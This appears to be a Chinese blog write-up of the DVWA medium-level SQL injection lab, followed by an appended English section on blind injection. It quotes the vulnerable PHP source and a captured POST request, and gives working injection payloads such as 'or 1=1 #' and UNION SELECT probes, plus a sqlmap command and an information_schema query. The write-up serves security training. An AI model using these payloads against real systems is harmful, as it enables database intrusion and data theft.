DVWA-SQL Injection(medium)

medium.php

SQL Injection Source
vulnerabilities/sqli/source/medium.php


<?php 

if( isset( $_POST[ 'Submit' ] ) ) { 
    // Get input 
    $id = $_POST[ 'id' ]; 

    $id = mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $id); 

    $query  = "SELECT first_name, last_name FROM users WHERE user_id = $id;"; 
    $result = mysqli_query($GLOBALS["___mysqli_ston"], $query) or die( '<pre>' . mysqli_error($GLOBALS["___mysqli_ston"]) . '</pre>' ); 

    // Get results 
    while( $row = mysqli_fetch_assoc( $result ) ) { 
        // Display values 
        $first = $row["first_name"]; 
        $last  = $row["last_name"]; 

        // Feedback for end user 
        echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>"; 
    } 

} 

// This is used later on in the index.php page 
// Setting it here so we can close the database connection in here like in the rest of the source scripts 
$query  = "SELECT COUNT(*) FROM users;"; 
$result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' ); 
$number_of_rows = mysqli_fetch_row( $result )[0]; 

mysqli_close($GLOBALS["___mysqli_ston"]); 
?> 

1.medium相对low级别的变化

1)代码中medium相对low级别的变化
 $id = mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $id); 

详见:
PHP mysqli_real_escape_string() 函数

2)前端页面中medium相对low级别的变化

页面设置下拉选择表单,对用户的输入作了限制。
在这里插入图片描述

2.漏洞利用

可以通过抓包改参数,提交恶意构造的查询参数。

POST http://127.0.0.1/dvwa/vulnerabilities/sqli/ HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://127.0.0.1/dvwa/vulnerabilities/sqli/
Accept-Language: zh-CN
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Content-Length: 18
DNT: 1
Host: 127.0.0.1
Pragma: no-cache
Cookie: security=medium; PHPSESSID=5c77n9pgnrr9u9i6383rko2oh6

id=1&Submit=Submit
1)判断注入类型

抓包更改参数id为1′ or 1=1 #
在这里插入图片描述
抓包更改参数id为1 or 1=1 #
在这里插入图片描述存在数字型注入。
因为数字型注入不需要借助引号,所以mysql_real_escape_string函数的设置对注入对我们要进行的注入操作无限制。

2)猜解字段

在这里插入图片描述在这里插入图片描述
得出结论:
字段数2个,即First name、Surname

3)确定显示的字段顺序

更改参数id为1 union select 1,2 #
在这里插入图片描述
sql查询语句:select First name,Surname from 表 where ID=id…

### DVWA SQL Blind Injection Medium Level Attack Method Tutorial In the context of DVWA (Damn Vulnerable Web Application), exploiting a SQL blind injection vulnerability at the medium difficulty level involves understanding how to interact with the application and craft specific payloads that can infer database structure or content based on true/false responses. The command provided serves as an example payload used within such attacks, specifically designed to retrieve table names from the current database schema by leveraging conditional logic in queries: ```sql select table_name from information_schema.tables where table_schema=database()[^1] ``` For executing this type of attack against DVWA's SQLi Blind challenge set to 'Medium', one approach is using automated tools like SqlMap which simplifies the process significantly. An invocation might look similar to what has been shared previously: ```bash py3 sqlmap.py -u "http://192.168.123.20/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie="PHPSESSID=248dmjg65dksvfvf8kk0k7vqj0; security=low" --current-db[^2] ``` This tool automates much of the work involved in detecting vulnerabilities, extracting data through time-based boolean conditions without direct output feedback, and even taking over databases under certain circumstances—all while adhering to user-defined constraints regarding legality and ethics. When performing manual exploitation for educational purposes only, consider crafting custom scripts or modifying existing ones according to your environment setup. The key lies in constructing queries that cause different behaviors depending on whether they evaluate to true or false, allowing inference about underlying structures indirectly via side-channel observations. --related questions-- 1. How does changing the security level affect the effectiveness of SQL injection techniques? 2. What are some common defenses implemented against SQL injections? 3. Can you explain more about Information Schema Tables and their role in discovering database objects during penetration testing? 4. Are there any particular challenges associated with exploiting blind SQL injections compared to error-based methods?
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值